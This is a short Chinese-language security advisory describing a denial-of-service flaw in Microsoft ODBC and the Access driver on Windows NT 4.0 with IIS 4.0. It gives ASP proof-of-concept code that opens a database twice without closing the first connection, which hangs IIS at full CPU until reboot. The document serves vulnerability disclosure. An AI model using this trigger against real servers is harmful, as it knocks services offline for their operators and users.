IDC资讯中心
18、ms odbc数据库连接溢出导致nt/9x拒绝服务攻击
漏 洞 描 述:
microsoft odbc数据库在连接和断开时可能存在潜在的溢出问题(microsoft access数据库相关)。
如果不取消连接而直接和第二个数据库相连接,可能导致服务停止。
影响系统:
odbc 版本: 3.510.3711.0
odbc access驱动版本: 3.51.1029.00
os 版本: windows nt 4.0 service pack 5, iis 4.0 (i386)
microsoft office 97 professional (mso97.dll: 8.0.0.3507)
漏洞检测方法如下:
odbc 连接源名称: miscdb
odbc 数据库型号: ms access
odbc 假设路径: d:\data\misc.mdb
asp代码如下:
<%
set connvb = server.createobject("adodb.connection")
connvb.open "driver={microsoft access driver (*.mdb)}; dsn=miscdb"
%>
<html>
<body>
…lots of html removed…
<!– we connect to db1 –>
<%
set connglobal = server.createobject("adodb.connection")
connglobal.open "dsn=miscdb;user=sa"
msql = "arb sql statement"
set rsglobal = connglobal.execute(msql)
while not rsglobal.eof
response.write rsglobal("resultfrommiscdb")
rsglobal.movenext
wend
rsglobal.close
set rsglobal = nothing
connglobal.close
set connglobal = nothing
note we do not close the connection
%>
<!– call the same database by means of dbq direct file access –>
<%
set connglobal = server.createobject("adodb.connection")
connglobal.open "driver={microsoft access driver (*.mdb)};
dbq=d:\data\misc.mdb"
msql = "arb sql statement"
set rsglobal = connglobal.execute(msql)
while not rsglobal.eof
response.write rsglobal("resultfrommiscdb")
rsglobal.movenext
wend
rsglobal.close
set rsglobal = nothing
connglobal.close
set connglobal = nothing
note we do close the connection
%>
在这种情况下,iis处理进程将会停顿,cpu使用率由于inetinfo.exe进程将达到100%。只有重新启动计算机才能恢复。
